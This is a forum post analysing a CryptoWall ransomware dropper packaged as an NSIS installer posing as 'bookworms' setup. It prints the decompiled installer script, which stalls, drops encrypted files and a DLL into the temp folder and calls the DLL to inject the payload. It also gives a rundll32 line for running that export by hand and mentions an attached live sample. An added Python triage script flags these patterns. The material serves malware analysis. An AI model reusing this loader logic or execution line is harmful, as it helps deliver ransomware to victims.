CryptoWall being distributed using an NSIS installer

As explained by Brad Duncan in his ISC handler's diary, CryptoWall is now being distributed via exploit kits. The payload is an NSIS installer.
The installer contained the files MuskegCommuneKinesthesia, suppress.navigation.xml, and skiplanes.dll. The sample from Brad's diary is attached to this post.

The extracted NSIS installer config is:
MuskegCommuneKinesthesia and suppress.navigation.xml appear to contain encrypted content. I am far from experienced with NSIS, but from the script it appears that CW is being installed via this command:

; NSIS script NSIS-3
; Install
SetCompressor /SOLID lzma
SetCompressorDictSize 8
; --------------------
; HEADER SIZE: 8765
; START HEADER SIZE: 300
; MAX STRING LENGTH: 1024
; STRING CHARS: 3171
OutFile [NSIS].exe
!include WinMessages.nsh
InstallDirRegKey HKCU Software\$$R1 $$7
LicenseBkColor /windows
; --------------------
; LANG TABLES: 1
; LANG STRINGS: 78
Name bookworms
BrandingText "Nullsoft Install System v3.0b1"
; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System v3.0b1"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 bookworms
LangString LSTR_3 1033 "Space available: "
LangString LSTR_4 1033 "Space required: "
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_13 1033 "Delete file: "
LangString LSTR_14 1033 "Delete on reboot: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_26 1033 "Remove folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_32 1033 B
LangString LSTR_33 1033 K
LangString LSTR_34 1033 M
LangString LSTR_35 1033 G
LangString LSTR_36 1033 "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)."
LangString LSTR_37 1033 "License Agreement"
LangString LSTR_38 1033 "Please review the license terms before installing $(LSTR_77)."
LangString LSTR_39 1033 "Press Page Down to see the rest of the agreement."
LangString LSTR_40 1033 "Choose Components"
LangString LSTR_41 1033 "Choose which features of $(LSTR_77) you want to install."
LangString LSTR_42 1033 Description
LangString LSTR_43 1033 "Position your mouse over a component to see its description."
LangString LSTR_44 1033 "Choose Install Location"
LangString LSTR_45 1033 "Choose the folder in which to install $(LSTR_77)."
LangString LSTR_46 1033 Installing
LangString LSTR_47 1033 "Please wait while $(LSTR_77) is being installed."
LangString LSTR_48 1033 "Installation Complete"
LangString LSTR_49 1033 "Setup was completed successfully."
LangString LSTR_50 1033 "Installation Aborted"
LangString LSTR_51 1033 "Setup was not completed successfully."
LangString LSTR_52 1033 "MS Shell Dlg"
LangString LSTR_53 1033 8
LangString LSTR_54 1033 "Are you sure you want to quit $(LSTR_2) Setup?"
LangString LSTR_55 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_56 1033 $R1
LangString LSTR_57 1033 Custom
LangString LSTR_58 1033 Cancel
LangString LSTR_59 1033 "< &Back"
LangString LSTR_60 1033 "I &Agree"
LangString LSTR_61 1033 "Click Next to continue."
LangString LSTR_62 1033 "Check the components you want to install and uncheck the components you don't want to install. $_CLICK"
LangString LSTR_63 1033 "Select the type of install:"
LangString LSTR_64 1033 "Or, select the optional components you wish to install:"
LangString LSTR_65 1033 "Select components to install:"
LangString LSTR_66 1033 "&Next >"
LangString LSTR_67 1033 "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK"
LangString LSTR_68 1033 "Destination Folder"
LangString LSTR_69 1033 B&rowse...
LangString LSTR_70 1033 "Select the folder to install $(LSTR_77) in:"
LangString LSTR_71 1033 &Install
LangString LSTR_72 1033 "Click Install to start the installation."
LangString LSTR_73 1033 "Show &details"
LangString LSTR_74 1033 Completed
LangString LSTR_75 1033 " "
LangString LSTR_76 1033 &Close
LangString LSTR_77 1033 bookworms
; --------------------
; VARIABLES: 34
Var _0_
Var _1_
Var _2_
Var _3_
Var _4_
Var _5_
Var _6_
Var _7_
Var _8_
Var _9_
Var _10_
Var _11_
Var _12_
Var _13_
Var _14_
Var _15_
Var _16_
Var _17_
Var _18_
Var _19_
Var _20_
Var _21_
Var _22_
Var _23_
Var _24_
Var _25_
Var _26_
Var _27_
Var _28_
Var _29_
Var _30_
Var _31_
Var _32_
Var _33_
InstType $(LSTR_57) ; Custom
InstallDir $TEMP
; wininit = $WINDIR\wininit.ini
; --------------------
; PAGES: 5
; Page 0
Page license func_0 func_3 func_9 /ENABLECANCEL
LicenseText $(LSTR_36) $(LSTR_60) ; "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)." "I &Agree" bookworms
LicenseData [LICENSE].txt
; Page 1
Page components func_10 func_13 func_27 /ENABLECANCEL
ComponentsText $(LSTR_62) $(LSTR_63) $(LSTR_64) ; "Check the components you want to install and uncheck the components you don't want to install. $_CLICK" "Select the type of install:" "Or, select the optional components you wish to install:"
; Page 2
Page directory func_28 func_31 func_39 /ENABLECANCEL
DirText $(LSTR_67) $(LSTR_68) $(LSTR_69) $(LSTR_70) ; "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK" "Destination Folder" B&rowse... "Select the folder to install $(LSTR_77) in:" bookworms bookworms
DirVar $CMDLINE
; Page 3
Page instfiles func_40 func_43 func_49
CompletedText $(LSTR_74) ; Completed
DetailsButtonText $(LSTR_73) ; "Show &details"
/*
; Page 4
Page COMPLETED
*/
; --------------------
; SECTIONS: 1
; COMMANDS: 127
Function func_0 ; Page 0, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_37) ; "License Agreement"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_38) ; "Please review the license terms before installing $(LSTR_77)." bookworms
FunctionEnd
Function func_3 ; Page 0, Show
FindWindow $_12_ "#32770" "" $HWNDPARENT
GetDlgItem $_13_ $_12_ 1040
GetDlgItem $_14_ $_12_ 1006
GetDlgItem $_15_ $_12_ 1000
SendMessage $_13_ ${WM_SETTEXT} 0 STR:$(LSTR_39) ; "Press Page Down to see the rest of the agreement."
FunctionEnd
Function func_9 ; Page 0, Leave
FunctionEnd
Function func_10 ; Page 1, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_40) ; "Choose Components"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_41) ; "Choose which features of $(LSTR_77) you want to install." bookworms
FunctionEnd
Function func_13 ; Page 1, Show
FindWindow $_16_ "#32770" "" $HWNDPARENT
GetDlgItem $_17_ $_16_ 1006
GetDlgItem $_18_ $_16_ 1021
GetDlgItem $_19_ $_16_ 1022
GetDlgItem $_20_ $_16_ 1017
GetDlgItem $_21_ $_16_ 1032
GetDlgItem $_22_ $_16_ 1042
GetDlgItem $_24_ $_16_ 1043
GetDlgItem $_25_ $_16_ 1023
SendMessage $_22_ ${WM_SETTEXT} 0 STR:$(LSTR_42) ; Description
EnableWindow $_24_ 0
SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_43) ; "Position your mouse over a component to see its description."
StrCpy $_23_ $(LSTR_43) ; "Position your mouse over a component to see its description."
FunctionEnd
Function func_27 ; Page 1, Leave
FunctionEnd
Function func_28 ; Page 2, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_44) ; "Choose Install Location"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_45) ; "Choose the folder in which to install $(LSTR_77)." bookworms
FunctionEnd
Function func_31 ; Page 2, Show
FindWindow $_26_ "#32770" "" $HWNDPARENT
GetDlgItem $_27_ $_26_ 1006
GetDlgItem $_28_ $_26_ 1020
GetDlgItem $_29_ $_26_ 1019
GetDlgItem $_30_ $_26_ 1001
GetDlgItem $_31_ $_26_ 1023
GetDlgItem $_32_ $_26_ 1024
FunctionEnd
Function func_39 ; Page 2, Leave
FunctionEnd
Function func_40 ; Page 3, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_46) ; Installing
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_47) ; "Please wait while $(LSTR_77) is being installed." bookworms
FunctionEnd
Function func_43 ; Page 3, Show
FindWindow $_33_ "#32770" "" $HWNDPARENT
GetDlgItem $_34_ $_33_ 1006
GetDlgItem $_35_ $_33_ 1004
GetDlgItem $_36_ $_33_ 1027
GetDlgItem $_37_ $_33_ 1016
FunctionEnd
Function func_49 ; Page 3, Leave
IfAbort label_53
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_48) ; "Installation Complete"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_49) ; "Setup was completed successfully."
Goto label_55
label_53:
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_50) ; "Installation Aborted"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_51) ; "Setup was not completed successfully."
label_55:
IfAbort label_56
label_56:
FunctionEnd
Function .onGUIInit
GetDlgItem $_0_ $HWNDPARENT 1037
CreateFont $_1_ $(LSTR_52) $(LSTR_53) 700 ; "MS Shell Dlg" 8
SendMessage $_0_ ${WM_SETFONT} $_1_ 0
GetDlgItem $_2_ $HWNDPARENT 1038
SetCtlColors $_0_ "" 0xFFFFFF
SetCtlColors $_2_ "" 0xFFFFFF
GetDlgItem $_3_ $HWNDPARENT 1034
SetCtlColors $_3_ "" 0xFFFFFF
GetDlgItem $_4_ $HWNDPARENT 1039
SetCtlColors $_4_ "" 0xFFFFFF
GetDlgItem $_6_ $HWNDPARENT 1028
SetCtlColors $_6_ /BRANDING ""
GetDlgItem $_5_ $HWNDPARENT 1256
SetCtlColors $_5_ /BRANDING ""
SendMessage $_5_ ${WM_SETTEXT} 0 "STR:$(LSTR_0) " ; "Nullsoft Install System v3.0b1"
GetDlgItem $_7_ $HWNDPARENT 1035
GetDlgItem $_8_ $HWNDPARENT 1045
GetDlgItem $_9_ $HWNDPARENT 1
GetDlgItem $_10_ $HWNDPARENT 2
GetDlgItem $_11_ $HWNDPARENT 3
FunctionEnd
Function .onUserAbort
MessageBox MB_YESNO|MB_ICONEXCLAMATION $(LSTR_54) IDYES label_80 ; "Are you sure you want to quit $(LSTR_2) Setup?" bookworms
Abort
label_80:
FunctionEnd
Function .onInit
StrCpy $R1 2
label_82:
DetailPrint $7
IntCmp $7 13105745 0 0 label_87
DetailPrint $7
IntOp $7 $7 + $R1
Goto label_82
label_87:
SetOutPath $INSTDIR
File MuskegCommuneKinesthesia
File suppress.navigation.xml
File skiplanes.dll
StrCpy $R7 MisbehaviourGittern
StrCpy $6 MuskegCommuneKinesthesia
System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
; Call Initialize_____Plugins
; SetOverwrite off
; File $PLUGINSDIR\System.dll
; SetDetailsPrint lastused
; Push "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
; CallInstDLL $PLUGINSDIR\System.dll Call
Quit
FunctionEnd
Section bookworms ; Section_0
SetOutPath $INSTDIR
WriteRegStr HKCU Software\$R1 $7 $INSTDIR
SectionEnd
Function .onMouseOverSection
StrCmp $0 -1 0 label_108
SendMessage $_24_ ${WM_SETTEXT} 0 STR:
EnableWindow $_24_ 0
SendMessage $_24_ ${WM_SETTEXT} 0 STR:$_23_
Goto label_112
label_108:
StrCmp $0 0 0 label_112
SendMessage $_24_ ${WM_SETTEXT} 0 STR:
EnableWindow $_24_ 1
SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_56) ; $R1
label_112:
FunctionEnd
/*
Function Initialize_____Plugins
SetDetailsPrint none
StrCmp $PLUGINSDIR "" 0 label_123
Push $0
SetErrors
GetTempFileName $0
Delete $0
CreateDirectory $0
IfErrors label_124
StrCpy $PLUGINSDIR $0
Pop $0
label_123:
Return
label_124:
MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK
Quit
FunctionEnd
*/
; --------------------
; UNREFERENCED STRINGS:
/*
1 ProgramFilesDir
17 CommonFilesDir
32 "C:\Program Files"
49 $PROGRAMFILES
53 "$PROGRAMFILES\Common Files"
70 $COMMONFILES
*/
System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"

When trying to convert it to a rundll32 line, I think it is something like:

rundll32.exe skiplanes.dll,Leakage 475 MuskegCommuneKinesthesia .r0 "<path_to>\suppress.navigation.xml" MisbehaviourGittern

Something is missing though, as executing the above command does not perform the injection/install. Not sure what .r0 represents other than that it is supposed to be an integer.
My guess is the leakage function decrypts the contents of the suppress.navigation.xml, which becomes the payload to inject?
I will leave that up to you reversers to figure that part out :)
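An added example, not code from the post or from the sample: a small Python triage script that parses the System::Call expression quoted above into its typed parameters (in NSIS System plugin syntax a leading `.` marks an output-only slot, so `i .r0` is an integer the DLL writes back into $0 rather than an input value) and runs a few static checks over the relevant lines of the decompiled .onInit, flagging the things a reviewer would want to see: InstallDir $TEMP, the counter loop before anything runs, a call into a DLL the installer itself just dropped, and Quit in .onInit so the sections and UI never execute. The SAMPLE excerpt is constructed from the script on this page; the finding strings are this example's own.

```python
import re

# Constructed input for this example: InstallDir plus the relevant lines of the post's .onInit.
SAMPLE = r'''
InstallDir $TEMP
Function .onInit
label_82:
IntCmp $7 13105745 0 0 label_87
IntOp $7 $7 + $R1
Goto label_82
label_87:
File skiplanes.dll
System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
Quit
FunctionEnd
'''

def parse_system_call(call):
    """Return (dll, export, [(type, value, is_output)]) for a System::Call string.
    A leading '.' marks an output-only slot: 'i .r0' is an int written back to $0."""
    m = re.match(r'"?(\w+)::(\w+)\((.*)\)"?$', call.strip())
    if not m:
        raise ValueError('not a System::Call expression: ' + call)
    dll, export, args = m.groups()
    params = []
    for raw in args.split(','):  # string args in this sample contain no commas
        typ, _, val = raw.strip().partition(' ')
        params.append((typ, val.lstrip('.').replace(r'$\"', '"'), val.startswith('.')))
    return dll, export, params

def triage(script):
    """Static checks over a decompiled NSIS script; returns a list of findings."""
    findings, dropped, in_oninit = [], set(), False
    for line in script.splitlines():
        s = line.strip()
        parts = s.split()
        in_oninit = s == 'Function .onInit' or (in_oninit and s != 'FunctionEnd')
        if s.startswith('InstallDir') and '$TEMP' in s:
            findings.append('InstallDir is $TEMP')
        elif s.startswith('File '):
            dropped.add(parts[1].lower())  # files the installer extracts
        elif s.startswith('IntCmp') and in_oninit and parts[2].isdigit() and int(parts[2]) > 1_000_000:
            findings.append('counter loop to %s in .onInit (stalling pattern)' % parts[2])
        elif s.startswith('System::Call'):
            dll, export, _ = parse_system_call(s[len('System::Call'):])
            if dll.lower() + '.dll' in dropped:
                findings.append('calls %s::%s in a DLL the installer itself dropped' % (dll, export))
        elif s == 'Quit' and in_oninit:
            findings.append('Quit in .onInit: sections and the installer UI never run')
    return findings
```

Running `triage(SAMPLE)` returns four findings for this excerpt; the same checks apply unchanged to any 7-Zip/NSIS decompiler output.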
Attachments
infected
(428 KiB) Downloaded 120 times
BleepingComputer.com